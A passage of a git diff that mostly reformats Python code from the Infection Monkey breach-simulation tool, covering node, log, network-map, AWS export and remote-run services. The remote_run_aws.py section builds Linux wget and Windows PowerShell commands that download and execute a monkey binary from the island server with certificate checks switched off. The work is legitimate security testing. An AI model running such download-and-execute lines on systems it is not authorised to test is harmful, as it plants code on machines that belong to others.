+ "timestamp":"2020-05-27T14:59:28.944Z",
+ "data":{
+ "os":{"type":"linux", "version":"Ubuntu-4ubuntu2.8"},
+ "services":{
+ "tcp-8088":{"display_name":"unknown(TCP)", "port":8088},
+ "tcp-22":{
+ "display_name":"SSH",
+ "port":22,
+ "banner":"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n",
+ "name":"ssh",
},
},
- "monkey_exe": None,
- "default_tunnel": None,
- "default_server": None,
+ "monkey_exe":None,
+ "default_tunnel":None,
+ "default_server":None,
},
}
]
EXPLOIT_DATA_MOCK = [
{
- "result": True,
- "exploiter": "ElasticGroovyExploiter",
- "info": {
- "display_name": "Elastic search",
- "started": "2020-05-11T08:59:38.105Z",
- "finished": "2020-05-11T08:59:38.106Z",
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "result":True,
+ "exploiter":"ElasticGroovyExploiter",
+ "info":{
+ "display_name":"Elastic search",
+ "started":"2020-05-11T08:59:38.105Z",
+ "finished":"2020-05-11T08:59:38.106Z",
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
},
- "attempts": [],
- "timestamp": "2020-05-27T14:59:29.048Z",
+ "attempts":[],
+ "timestamp":"2020-05-27T14:59:29.048Z",
}
]
class TestDisplayedEdgeService:
def test_get_displayed_edges_by_to(self):
-
dst_id = ObjectId()
src_id = ObjectId()
@@ -60,15 +59,15 @@ class TestDisplayedEdgeService:
src_node_id = ObjectId()
dst_node_id = ObjectId()
edge = EdgeService(
- src_node_id=src_node_id,
- dst_node_id=dst_node_id,
- scans=SCAN_DATA_MOCK,
- exploits=EXPLOIT_DATA_MOCK,
- exploited=True,
- domain_name=None,
- ip_address="10.2.2.2",
- dst_label="Ubuntu-4ubuntu2.8",
- src_label="Ubuntu-4ubuntu3.2",
+ src_node_id=src_node_id,
+ dst_node_id=dst_node_id,
+ scans=SCAN_DATA_MOCK,
+ exploits=EXPLOIT_DATA_MOCK,
+ exploited=True,
+ domain_name=None,
+ ip_address="10.2.2.2",
+ dst_label="Ubuntu-4ubuntu2.8",
+ src_label="Ubuntu-4ubuntu3.2",
)
displayed_edge = DisplayedEdgeService.edge_to_displayed_edge(edge)
@@ -77,7 +76,7 @@ class TestDisplayedEdgeService:
assert displayed_edge["from"] == src_node_id
assert displayed_edge["ip_address"] == "10.2.2.2"
assert displayed_edge["services"] == ["tcp-8088: unknown", "tcp-22: ssh"]
- assert displayed_edge["os"] == {"type": "linux", "version": "Ubuntu-4ubuntu2.8"}
+ assert displayed_edge["os"] == {"type":"linux", "version":"Ubuntu-4ubuntu2.8"}
assert displayed_edge["exploits"] == EXPLOIT_DATA_MOCK
assert displayed_edge["_label"] == "Ubuntu-4ubuntu3.2 " + RIGHT_ARROW + " Ubuntu-4ubuntu2.8"
assert displayed_edge["group"] == "exploited"
@@ -85,11 +84,11 @@ class TestDisplayedEdgeService:
def test_services_to_displayed_services(self):
services1 = DisplayedEdgeService.services_to_displayed_services(
- SCAN_DATA_MOCK[-1]["data"]["services"], True
+ SCAN_DATA_MOCK[-1]["data"]["services"], True
)
assert services1 == ["tcp-8088", "tcp-22"]
services2 = DisplayedEdgeService.services_to_displayed_services(
- SCAN_DATA_MOCK[-1]["data"]["services"], False
+ SCAN_DATA_MOCK[-1]["data"]["services"], False
)
assert services2 == ["tcp-8088: unknown", "tcp-22: ssh"]
diff --git a/monkey/monkey_island/cc/services/infection_lifecycle.py b/monkey/monkey_island/cc/services/infection_lifecycle.py
index 1f4c0e87e..c0b56c08d 100644
--- a/monkey/monkey_island/cc/services/infection_lifecycle.py
+++ b/monkey/monkey_island/cc/services/infection_lifecycle.py
@@ -20,10 +20,10 @@ class InfectionLifecycle:
@staticmethod
def kill_all():
mongo.db.monkey.update(
- {"dead": False},
- {"$set": {"config.alive": False, "modifytime": datetime.now()}},
- upsert=False,
- multi=True,
+ {"dead":False},
+ {"$set":{"config.alive":False, "modifytime":datetime.now()}},
+ upsert=False,
+ multi=True,
)
logger.info("Kill all monkeys was called")
return jsonify(status="OK")
@@ -40,15 +40,16 @@ class InfectionLifecycle:
report_done = False
return dict(
- run_server=True,
- run_monkey=is_any_exists,
- infection_done=infection_done,
- report_done=report_done,
+ run_server=True,
+ run_monkey=is_any_exists,
+ infection_done=infection_done,
+ report_done=report_done,
)
@staticmethod
def _on_finished_infection():
- # Checking is_report_being_generated here, because we don't want to wait to generate a report; rather,
+ # Checking is_report_being_generated here, because we don't want to wait to generate a
+ # report; rather,
# we want to skip and reply.
if not is_report_being_generated() and not ReportService.is_latest_report_exists():
safe_generate_reports()
diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py
index 846b2e844..dc189b297 100644
--- a/monkey/monkey_island/cc/services/island_logs.py
+++ b/monkey/monkey_island/cc/services/island_logs.py
@@ -13,7 +13,8 @@ class IslandLogService:
def get_log_file():
"""
This static function is a helper function for the monkey island log download function.
- It finds the logger handlers and checks if one of them is a fileHandler of any kind by checking if the handler
+ It finds the logger handlers and checks if one of them is a fileHandler of any kind by
+ checking if the handler
has the property handler.baseFilename.
:return:
a dict with the log file content.
@@ -25,7 +26,7 @@ class IslandLogService:
log_file_path = handler.baseFilename
with open(log_file_path, "rt") as f:
log_file = f.read()
- return {"log_file": log_file}
+ return {"log_file":log_file}
logger.warning("No log file could be found, check logger config.")
return None
diff --git a/monkey/monkey_island/cc/services/log.py b/monkey/monkey_island/cc/services/log.py
index f4f3374d6..2632d3cb9 100644
--- a/monkey/monkey_island/cc/services/log.py
+++ b/monkey/monkey_island/cc/services/log.py
@@ -12,33 +12,33 @@ class LogService:
@staticmethod
def get_log_by_monkey_id(monkey_id):
- log = mongo.db.log.find_one({"monkey_id": monkey_id})
+ log = mongo.db.log.find_one({"monkey_id":monkey_id})
if log:
log_file = database.gridfs.get(log["file_id"])
monkey_label = monkey_island.cc.services.node.NodeService.get_monkey_label(
- monkey_island.cc.services.node.NodeService.get_monkey_by_id(log["monkey_id"])
+ monkey_island.cc.services.node.NodeService.get_monkey_by_id(log["monkey_id"])
)
return {
- "monkey_label": monkey_label,
- "log": log_file.read().decode(),
- "timestamp": log["timestamp"],
+ "monkey_label":monkey_label,
+ "log":log_file.read().decode(),
+ "timestamp":log["timestamp"],
}
@staticmethod
def remove_logs_by_monkey_id(monkey_id):
- log = mongo.db.log.find_one({"monkey_id": monkey_id})
+ log = mongo.db.log.find_one({"monkey_id":monkey_id})
if log is not None:
database.gridfs.delete(log["file_id"])
- mongo.db.log.delete_one({"monkey_id": monkey_id})
+ mongo.db.log.delete_one({"monkey_id":monkey_id})
@staticmethod
def add_log(monkey_id, log_data, timestamp=datetime.now()):
LogService.remove_logs_by_monkey_id(monkey_id)
file_id = database.gridfs.put(log_data, encoding="utf-8")
return mongo.db.log.insert(
- {"monkey_id": monkey_id, "file_id": file_id, "timestamp": timestamp}
+ {"monkey_id":monkey_id, "file_id":file_id, "timestamp":timestamp}
)
@staticmethod
def log_exists(monkey_id):
- return mongo.db.log.find_one({"monkey_id": monkey_id}) is not None
+ return mongo.db.log.find_one({"monkey_id":monkey_id}) is not None
diff --git a/monkey/monkey_island/cc/services/netmap/net_edge.py b/monkey/monkey_island/cc/services/netmap/net_edge.py
index 008fa5b54..11227782e 100644
--- a/monkey/monkey_island/cc/services/netmap/net_edge.py
+++ b/monkey/monkey_island/cc/services/netmap/net_edge.py
@@ -28,17 +28,18 @@ class NetEdgeService:
count = 0
for monkey_id in monkey_ids:
count += 1
- # generating fake ID, because front end requires unique ID's for each edge. Collision improbable
+ # generating fake ID, because front end requires unique ID's for each edge. Collision
+ # improbable
fake_id = ObjectId(hex(count)[2:].zfill(24))
island_id = ObjectId("000000000000000000000000")
monkey_label = NodeService.get_label_for_endpoint(monkey_id)
island_label = NodeService.get_label_for_endpoint(island_id)
island_pseudo_edge = DisplayedEdgeService.generate_pseudo_edge(
- edge_id=fake_id,
- src_node_id=monkey_id,
- dst_node_id=island_id,
- src_label=monkey_label,
- dst_label=island_label,
+ edge_id=fake_id,
+ src_node_id=monkey_id,
+ dst_node_id=island_id,
+ src_label=monkey_label,
+ dst_label=island_label,
)
edges.append(island_pseudo_edge)
return edges
@@ -53,24 +54,25 @@ class NetEdgeService:
x.id
for x in Monkey.objects()
if ("tunnel" not in x)
- and (x.id not in existing_ids)
- and (x.id != monkey_island_monkey["_id"])
+ and (x.id not in existing_ids)
+ and (x.id != monkey_island_monkey["_id"])
]
edges = []
count = 0
for monkey_id in monkey_ids:
count += 1
- # generating fake ID, because front end requires unique ID's for each edge. Collision improbable
+ # generating fake ID, because front end requires unique ID's for each edge. Collision
+ # improbable
fake_id = ObjectId(hex(count)[2:].zfill(24))
src_label = NodeService.get_label_for_endpoint(monkey_id)
dst_label = NodeService.get_label_for_endpoint(monkey_island_monkey["_id"])
edge = DisplayedEdgeService.generate_pseudo_edge(
- edge_id=fake_id,
- src_node_id=monkey_id,
- dst_node_id=monkey_island_monkey["_id"],
- src_label=src_label,
- dst_label=dst_label,
+ edge_id=fake_id,
+ src_node_id=monkey_id,
+ dst_node_id=monkey_island_monkey["_id"],
+ src_label=src_label,
+ dst_label=dst_label,
)
edges.append(edge)
diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py
index 2c1fe731a..4f50fc446 100644
--- a/monkey/monkey_island/cc/services/node.py
+++ b/monkey/monkey_island/cc/services/node.py
@@ -25,7 +25,7 @@ class NodeService:
if ObjectId(node_id) == NodeService.get_monkey_island_pseudo_id():
return NodeService.get_monkey_island_node()
- new_node = {"id": node_id}
+ new_node = {"id":node_id}
node = NodeService.get_node_by_id(node_id)
if node is None:
@@ -63,7 +63,7 @@ class NodeService:
edge_exploit["origin"] = from_node_label
exploits.append(edge_exploit)
- exploits = sorted(exploits, key=lambda exploit: exploit["timestamp"])
+ exploits = sorted(exploits, key=lambda exploit:exploit["timestamp"])
new_node["exploits"] = exploits
new_node["accessible_from_nodes"] = accessible_from_nodes
@@ -111,7 +111,7 @@ class NodeService:
@staticmethod
def get_monkey_critical_services(monkey_id):
critical_services = mongo.db.monkey.find_one(
- {"_id": monkey_id}, {"critical_services": 1}
+ {"_id":monkey_id}, {"critical_services":1}
).get("critical_services", [])
return critical_services
@@ -156,34 +156,35 @@ class NodeService:
)
monkey_group = NodeService.get_monkey_group(monkey)
return {
- "id": monkey_id,
- "label": label,
- "group": monkey_group,
- "os": NodeService.get_monkey_os(monkey),
- # The monkey is running IFF the group contains "_running". Therefore it's dead IFF the group does NOT
+ "id":monkey_id,
+ "label":label,
+ "group":monkey_group,
+ "os":NodeService.get_monkey_os(monkey),
+ # The monkey is running IFF the group contains "_running". Therefore it's dead IFF
+ # the group does NOT
# contain "_running". This is a small optimisation, to not call "is_dead" twice.
- "dead": "_running" not in monkey_group,
- "domain_name": "",
- "pba_results": monkey["pba_results"] if "pba_results" in monkey else [],
+ "dead":"_running" not in monkey_group,
+ "domain_name":"",
+ "pba_results":monkey["pba_results"] if "pba_results" in monkey else [],
}
@staticmethod
def node_to_net_node(node, for_report=False):
label = node["os"]["version"] if for_report else NodeService.get_node_label(node)
return {
- "id": node["_id"],
- "label": label,
- "group": NodeService.get_node_group(node),
- "os": NodeService.get_node_os(node),
+ "id":node["_id"],
+ "label":label,
+ "group":NodeService.get_node_group(node),
+ "os":NodeService.get_node_os(node),
}
@staticmethod
def set_node_group(node_id: str, node_group: NodeStates):
- mongo.db.node.update({"_id": node_id}, {"$set": {"group": node_group.value}}, upsert=False)
+ mongo.db.node.update({"_id":node_id}, {"$set":{"group":node_group.value}}, upsert=False)
@staticmethod
def unset_all_monkey_tunnels(monkey_id):
- mongo.db.monkey.update({"_id": monkey_id}, {"$unset": {"tunnel": ""}}, upsert=False)
+ mongo.db.monkey.update({"_id":monkey_id}, {"$unset":{"tunnel":""}}, upsert=False)
edges = EdgeService.get_tunnel_edges_by_src(monkey_id)
for edge in edges:
@@ -194,15 +195,15 @@ class NodeService:
tunnel_host_id = NodeService.get_monkey_by_ip(tunnel_host_ip)["_id"]
NodeService.unset_all_monkey_tunnels(monkey_id)
mongo.db.monkey.update(
- {"_id": monkey_id}, {"$set": {"tunnel": tunnel_host_id}}, upsert=False
+ {"_id":monkey_id}, {"$set":{"tunnel":tunnel_host_id}}, upsert=False
)
monkey_label = NodeService.get_label_for_endpoint(monkey_id)
tunnel_host_label = NodeService.get_label_for_endpoint(tunnel_host_id)
tunnel_edge = EdgeService.get_or_create_edge(
- src_node_id=monkey_id,
- dst_node_id=tunnel_host_id,
- src_label=monkey_label,
- dst_label=tunnel_host_label,
+ src_node_id=monkey_id,
+ dst_node_id=tunnel_host_id,
+ src_label=monkey_label,
+ dst_label=tunnel_host_label,
)
tunnel_edge.tunnel = True
tunnel_edge.ip_address = tunnel_host_ip
@@ -211,50 +212,50 @@ class NodeService:
@staticmethod
def insert_node(ip_address, domain_name=""):
new_node_insert_result = mongo.db.node.insert_one(
- {
- "ip_addresses": [ip_address],
- "domain_name": domain_name,
- "exploited": False,
- "creds": [],
- "os": {"type": "unknown", "version": "unknown"},
- }
+ {
+ "ip_addresses":[ip_address],
+ "domain_name":domain_name,
+ "exploited":False,
+ "creds":[],
+ "os":{"type":"unknown", "version":"unknown"},
+ }
)
- return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id})
+ return mongo.db.node.find_one({"_id":new_node_insert_result.inserted_id})
@staticmethod
def create_node_from_bootloader_telem(bootloader_telem: Dict, will_monkey_run: bool):
new_node_insert_result = mongo.db.node.insert_one(
- {
- "ip_addresses": bootloader_telem["ips"],
- "domain_name": bootloader_telem["hostname"],
- "will_monkey_run": will_monkey_run,
- "exploited": False,
- "creds": [],
- "os": {
- "type": bootloader_telem["system"],
- "version": bootloader_telem["os_version"],
- },
- }
+ {
+ "ip_addresses":bootloader_telem["ips"],
+ "domain_name":bootloader_telem["hostname"],
+ "will_monkey_run":will_monkey_run,
+ "exploited":False,
+ "creds":[],
+ "os":{
+ "type":bootloader_telem["system"],
+ "version":bootloader_telem["os_version"],
+ },
+ }
)
- return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id})
+ return mongo.db.node.find_one({"_id":new_node_insert_result.inserted_id})
@staticmethod
def get_or_create_node_from_bootloader_telem(
- bootloader_telem: Dict, will_monkey_run: bool
+ bootloader_telem: Dict, will_monkey_run: bool
) -> Dict:
if is_local_ips(bootloader_telem["ips"]):
raise NodeCreationException("Bootloader ran on island, no need to create new node.")
- new_node = mongo.db.node.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}})
+ new_node = mongo.db.node.find_one({"ip_addresses":{"$in":bootloader_telem["ips"]}})
# Temporary workaround to not create a node after monkey finishes
- monkey_node = mongo.db.monkey.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}})
+ monkey_node = mongo.db.monkey.find_one({"ip_addresses":{"$in":bootloader_telem["ips"]}})
if monkey_node:
# Don't create new node, monkey node is already present
return monkey_node
if new_node is None:
new_node = NodeService.create_node_from_bootloader_telem(
- bootloader_telem, will_monkey_run
+ bootloader_telem, will_monkey_run
)
if bootloader_telem["tunnel"]:
dst_node = NodeService.get_node_or_monkey_by_ip(bootloader_telem["tunnel"])
@@ -263,10 +264,10 @@ class NodeService:
src_label = NodeService.get_label_for_endpoint(new_node["_id"])
dst_label = NodeService.get_label_for_endpoint(dst_node["id"])
edge = EdgeService.get_or_create_edge(
- src_node_id=new_node["_id"],
- dst_node_id=dst_node["id"],
- src_label=src_label,
- dst_label=dst_label,
+ src_node_id=new_node["_id"],
+ dst_node_id=dst_node["id"],
+ src_label=src_label,
+ dst_label=dst_label,
)
edge.tunnel = bool(bootloader_telem["tunnel"])
edge.ip_address = bootloader_telem["ips"][0]
@@ -276,51 +277,51 @@ class NodeService:
@staticmethod
def get_or_create_node(ip_address, domain_name=""):
- new_node = mongo.db.node.find_one({"ip_addresses": ip_address})
+ new_node = mongo.db.node.find_one({"ip_addresses":ip_address})
if new_node is None:
new_node = NodeService.insert_node(ip_address, domain_name)
return new_node
@staticmethod
def get_monkey_by_id(monkey_id):
- return mongo.db.monkey.find_one({"_id": ObjectId(monkey_id)})
+ return mongo.db.monkey.find_one({"_id":ObjectId(monkey_id)})
@staticmethod
def get_monkey_by_guid(monkey_guid):
- return mongo.db.monkey.find_one({"guid": monkey_guid})
+ return mongo.db.monkey.find_one({"guid":monkey_guid})
@staticmethod
def get_monkey_by_ip(ip_address):
- return mongo.db.monkey.find_one({"ip_addresses": ip_address})
+ return mongo.db.monkey.find_one({"ip_addresses":ip_address})
@staticmethod
def get_node_by_ip(ip_address):
- return mongo.db.node.find_one({"ip_addresses": ip_address})
+ return mongo.db.node.find_one({"ip_addresses":ip_address})
@staticmethod
def get_node_by_id(node_id):
- return mongo.db.node.find_one({"_id": ObjectId(node_id)})
+ return mongo.db.node.find_one({"_id":ObjectId(node_id)})
@staticmethod
def update_monkey_modify_time(monkey_id):
mongo.db.monkey.update(
- {"_id": monkey_id}, {"$set": {"modifytime": datetime.now()}}, upsert=False
+ {"_id":monkey_id}, {"$set":{"modifytime":datetime.now()}}, upsert=False
)
@staticmethod
def set_monkey_dead(monkey, is_dead):
- props_to_set = {"dead": is_dead}
+ props_to_set = {"dead":is_dead}
# Cancel the force kill once monkey died
if is_dead:
props_to_set["config.alive"] = True
- mongo.db.monkey.update({"guid": monkey["guid"]}, {"$set": props_to_set}, upsert=False)
+ mongo.db.monkey.update({"guid":monkey["guid"]}, {"$set":props_to_set}, upsert=False)
@staticmethod
def add_communication_info(monkey, info):
mongo.db.monkey.update(
- {"guid": monkey["guid"]}, {"$set": {"command_control_channel": info}}, upsert=False
+ {"guid":monkey["guid"]}, {"$set":{"command_control_channel":info}}, upsert=False
)
@staticmethod
@@ -339,9 +340,9 @@ class NodeService:
@staticmethod
def get_monkey_island_pseudo_net_node():
return {
- "id": NodeService.get_monkey_island_pseudo_id(),
- "label": "MonkeyIsland",
- "group": "island",
+ "id":NodeService.get_monkey_island_pseudo_id(),
+ "label":"MonkeyIsland",
+ "group":"island",
}
@staticmethod
@@ -353,22 +354,22 @@ class NodeService:
@staticmethod
def set_node_exploited(node_id):
- mongo.db.node.update({"_id": node_id}, {"$set": {"exploited": True}})
+ mongo.db.node.update({"_id":node_id}, {"$set":{"exploited":True}})
@staticmethod
def update_dead_monkeys():
# Update dead monkeys only if no living monkey transmitted keepalive in the last 10 minutes
if mongo.db.monkey.find_one(
- {"dead": {"$ne": True}, "keepalive": {"$gte": datetime.now() - timedelta(minutes=10)}}
+ {"dead":{"$ne":True}, "keepalive":{"$gte":datetime.now() - timedelta(minutes=10)}}
):
return
# config.alive is changed to true to cancel the force kill of dead monkeys
mongo.db.monkey.update(
- {"keepalive": {"$lte": datetime.now() - timedelta(minutes=10)}, "dead": {"$ne": True}},
- {"$set": {"dead": True, "config.alive": True, "modifytime": datetime.now()}},
- upsert=False,
- multi=True,
+ {"keepalive":{"$lte":datetime.now() - timedelta(minutes=10)}, "dead":{"$ne":True}},
+ {"$set":{"dead":True, "config.alive":True, "modifytime":datetime.now()}},
+ upsert=False,
+ multi=True,
)
@staticmethod
@@ -386,11 +387,11 @@ class NodeService:
@staticmethod
def add_credentials_to_monkey(monkey_id, creds):
- mongo.db.monkey.update({"_id": monkey_id}, {"$push": {"creds": creds}})
+ mongo.db.monkey.update({"_id":monkey_id}, {"$push":{"creds":creds}})
@staticmethod
def add_credentials_to_node(node_id, creds):
- mongo.db.node.update({"_id": node_id}, {"$push": {"creds": creds}})
+ mongo.db.node.update({"_id":node_id}, {"$push":{"creds":creds}})
@staticmethod
def get_node_or_monkey_by_ip(ip_address):
@@ -413,7 +414,7 @@ class NodeService:
@staticmethod
def get_hostname_by_id(node_id):
return NodeService.get_node_hostname(
- mongo.db.monkey.find_one({"_id": node_id}, {"hostname": 1})
+ mongo.db.monkey.find_one({"_id":node_id}, {"hostname":1})
)
@staticmethod
diff --git a/monkey/monkey_island/cc/services/post_breach_files.py b/monkey/monkey_island/cc/services/post_breach_files.py
index 4215227ea..b8411470d 100644
--- a/monkey/monkey_island/cc/services/post_breach_files.py
+++ b/monkey/monkey_island/cc/services/post_breach_files.py
@@ -15,17 +15,16 @@ PBA_WINDOWS_FILENAME_PATH = ["monkey", "post_breach", "PBA_windows_filename"]
PBA_LINUX_FILENAME_PATH = ["monkey", "post_breach", "PBA_linux_filename"]
UPLOADS_DIR_NAME = "userUploads"
-
ABS_UPLOAD_PATH = Path(MONKEY_ISLAND_ABS_PATH, "cc", UPLOADS_DIR_NAME)
def remove_PBA_files():
if monkey_island.cc.services.config.ConfigService.get_config():
windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(
- PBA_WINDOWS_FILENAME_PATH
+ PBA_WINDOWS_FILENAME_PATH
)
linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(
- PBA_LINUX_FILENAME_PATH
+ PBA_LINUX_FILENAME_PATH
)
if linux_filename:
remove_file(linux_filename)
@@ -49,10 +48,10 @@ def set_config_PBA_files(config_json):
"""
if monkey_island.cc.services.config.ConfigService.get_config():
linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(
- PBA_LINUX_FILENAME_PATH
+ PBA_LINUX_FILENAME_PATH
)
windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(
- PBA_WINDOWS_FILENAME_PATH
+ PBA_WINDOWS_FILENAME_PATH
)
config_json["monkey"]["post_breach"]["PBA_linux_filename"] = linux_filename
config_json["monkey"]["post_breach"]["PBA_windows_filename"] = windows_filename
diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py
index e640110e0..7ed0d1b04 100644
--- a/monkey/monkey_island/cc/services/remote_run_aws.py
+++ b/monkey/monkey_island/cc/services/remote_run_aws.py
@@ -46,14 +46,14 @@ class RemoteRunAwsService:
"""
instances_bitness = RemoteRunAwsService.get_bitness(instances)
return CmdRunner.run_multiple_commands(
- instances,
- lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async(
- instance["instance_id"],
- RemoteRunAwsService._is_linux(instance["os"]),
- island_ip,
- instances_bitness[instance["instance_id"]],
- ),
- lambda _, result: result.is_success,
+ instances,
+ lambda instance:RemoteRunAwsService.run_aws_monkey_cmd_async(
+ instance["instance_id"],
+ RemoteRunAwsService._is_linux(instance["os"]),
+ island_ip,
+ instances_bitness[instance["instance_id"]],
+ ),
+ lambda _, result:result.is_success,
)
@staticmethod
@@ -72,16 +72,17 @@ class RemoteRunAwsService:
"""
For all given instances, checks whether they're 32 or 64 bit.
:param instances: List of instances to check
- :return: Dictionary with instance ids as keys, and True/False as values. True if 64bit, False otherwise
+ :return: Dictionary with instance ids as keys, and True/False as values. True if 64bit,
+ False otherwise
"""
return CmdRunner.run_multiple_commands(
- instances,
- lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async(
- instance["instance_id"], RemoteRunAwsService._is_linux(instance["os"])
- ),
- lambda instance, result: RemoteRunAwsService._get_bitness_by_result(
- RemoteRunAwsService._is_linux(instance["os"]), result
- ),
+ instances,
+ lambda instance:RemoteRunAwsService.run_aws_bitness_cmd_async(
+ instance["instance_id"], RemoteRunAwsService._is_linux(instance["os"])
+ ),
+ lambda instance, result:RemoteRunAwsService._get_bitness_by_result(
+ RemoteRunAwsService._is_linux(instance["os"]), result
+ ),
)
@staticmethod
@@ -92,7 +93,7 @@ class RemoteRunAwsService:
return result.stdout.find("i686") == -1 # i686 means 32bit
else:
return (
- result.stdout.lower().find("programfiles(x86)") != -1
+ result.stdout.lower().find("programfiles(x86)") != -1
) # if not found it means 32bit
@staticmethod
@@ -131,30 +132,30 @@ class RemoteRunAwsService:
@staticmethod
def _get_run_monkey_cmd_linux_line(bit_text, island_ip):
return (
- r"wget --no-check-certificate https://"
- + island_ip
- + r":5000/api/monkey/download/monkey-linux-"
- + bit_text
- + r"; chmod +x monkey-linux-"
- + bit_text
- + r"; ./monkey-linux-"
- + bit_text
- + r" m0nk3y -s "
- + island_ip
- + r":5000"
+ r"wget --no-check-certificate https://"
+ + island_ip
+ + r":5000/api/monkey/download/monkey-linux-"
+ + bit_text
+ + r"; chmod +x monkey-linux-"
+ + bit_text
+ + r"; ./monkey-linux-"
+ + bit_text
+ + r" m0nk3y -s "
+ + island_ip
+ + r":5000"
)
@staticmethod
def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
return (
- r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {"
- r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://"
- + island_ip
- + r":5000/api/monkey/download/monkey-windows-"
- + bit_text
- + r".exe','.\\monkey.exe'); "
- r";Start-Process -FilePath '.\\monkey.exe' "
- r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
+ r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {"
+ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://"
+ + island_ip
+ + r":5000/api/monkey/download/monkey-windows-"
+ + bit_text
+ + r".exe','.\\monkey.exe'); "
+ r";Start-Process -FilePath '.\\monkey.exe' "
+ r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
)
@staticmethod
diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
index 1505b63aa..da441aa4e 100644
--- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py
+++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
@@ -48,30 +48,30 @@ class AWSExporter(Exporter):
@staticmethod
def _prepare_finding(issue, region):
findings_dict = {
- "island_cross_segment": AWSExporter._handle_island_cross_segment_issue,
- "ssh": AWSExporter._handle_ssh_issue,
- "shellshock": AWSExporter._handle_shellshock_issue,
- "tunnel": AWSExporter._handle_tunnel_issue,
- "elastic": AWSExporter._handle_elastic_issue,
- "smb_password": AWSExporter._handle_smb_password_issue,
- "smb_pth": AWSExporter._handle_smb_pth_issue,
- "sambacry": AWSExporter._handle_sambacry_issue,
- "shared_passwords": AWSExporter._handle_shared_passwords_issue,
- "wmi_password": AWSExporter._handle_wmi_password_issue,
- "wmi_pth": AWSExporter._handle_wmi_pth_issue,
- "ssh_key": AWSExporter._handle_ssh_key_issue,
- "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
- "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
- "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
- "struts2": AWSExporter._handle_struts2_issue,
- "weblogic": AWSExporter._handle_weblogic_issue,
- "hadoop": AWSExporter._handle_hadoop_issue,
+ "island_cross_segment":AWSExporter._handle_island_cross_segment_issue,
+ "ssh":AWSExporter._handle_ssh_issue,
+ "shellshock":AWSExporter._handle_shellshock_issue,
+ "tunnel":AWSExporter._handle_tunnel_issue,
+ "elastic":AWSExporter._handle_elastic_issue,
+ "smb_password":AWSExporter._handle_smb_password_issue,
+ "smb_pth":AWSExporter._handle_smb_pth_issue,
+ "sambacry":AWSExporter._handle_sambacry_issue,
+ "shared_passwords":AWSExporter._handle_shared_passwords_issue,
+ "wmi_password":AWSExporter._handle_wmi_password_issue,
+ "wmi_pth":AWSExporter._handle_wmi_pth_issue,
+ "ssh_key":AWSExporter._handle_ssh_key_issue,
+ "shared_passwords_domain":AWSExporter._handle_shared_passwords_domain_issue,
+ "shared_admins_domain":AWSExporter._handle_shared_admins_domain_issue,
+ "strong_users_on_crit":AWSExporter._handle_strong_users_on_crit_issue,
+ "struts2":AWSExporter._handle_struts2_issue,
+ "weblogic":AWSExporter._handle_weblogic_issue,
+ "hadoop":AWSExporter._handle_hadoop_issue,
# azure and conficker are not relevant issues for an AWS env
}
configured_product_arn = INFECTION_MONKEY_ARN
product_arn = "arn:aws:securityhub:{region}:{arn}".format(
- region=region, arn=configured_product_arn
+ region=region, arn=configured_product_arn
)
instance_arn = "arn:aws:ec2:" + str(region) + ":instance:{instance_id}"
# Not suppressing error here on purpose.
@@ -79,18 +79,18 @@ class AWSExporter(Exporter):
logger.debug("aws account id acquired: {}".format(account_id))
finding = {
- "SchemaVersion": "2018-10-08",
- "Id": uuid.uuid4().hex,
- "ProductArn": product_arn,
- "GeneratorId": issue["type"],
- "AwsAccountId": account_id,
- "RecordState": "ACTIVE",
- "Types": ["Software and Configuration Checks/Vulnerabilities/CVE"],
- "CreatedAt": datetime.now().isoformat() + "Z",
- "UpdatedAt": datetime.now().isoformat() + "Z",
+ "SchemaVersion":"2018-10-08",
+ "Id":uuid.uuid4().hex,
+ "ProductArn":product_arn,
+ "GeneratorId":issue["type"],
+ "AwsAccountId":account_id,
+ "RecordState":"ACTIVE",
+ "Types":["Software and Configuration Checks/Vulnerabilities/CVE"],
+ "CreatedAt":datetime.now().isoformat() + "Z",
+ "UpdatedAt":datetime.now().isoformat() + "Z",
}
return AWSExporter.merge_two_dicts(
- finding, findings_dict[issue["type"]](issue, instance_arn)
+ finding, findings_dict[issue["type"]](issue, instance_arn)
)
@staticmethod
@@ -101,7 +101,8 @@ class AWSExporter(Exporter):
logger.debug("Client acquired: {0}".format(repr(security_hub_client)))
# Assumes the machine has the correct IAM role to do this, @see
- # https://github.com/guardicore/monkey/wiki/Monkey-Island:-Running-the-monkey-on-AWS-EC2-instances
+ # https://github.com/guardicore/monkey/wiki/Monkey-Island:-Running-the-monkey-on-AWS
+ # -EC2-instances
import_response = security_hub_client.batch_import_findings(Findings=findings_list)
logger.debug("Import findings response: {0}".format(repr(import_response)))
@@ -111,9 +112,8 @@ class AWSExporter(Exporter):
return False
except UnknownServiceError as e:
logger.warning(
- "AWS exporter called but AWS-CLI security hub service is not installed. Error: {}".format(
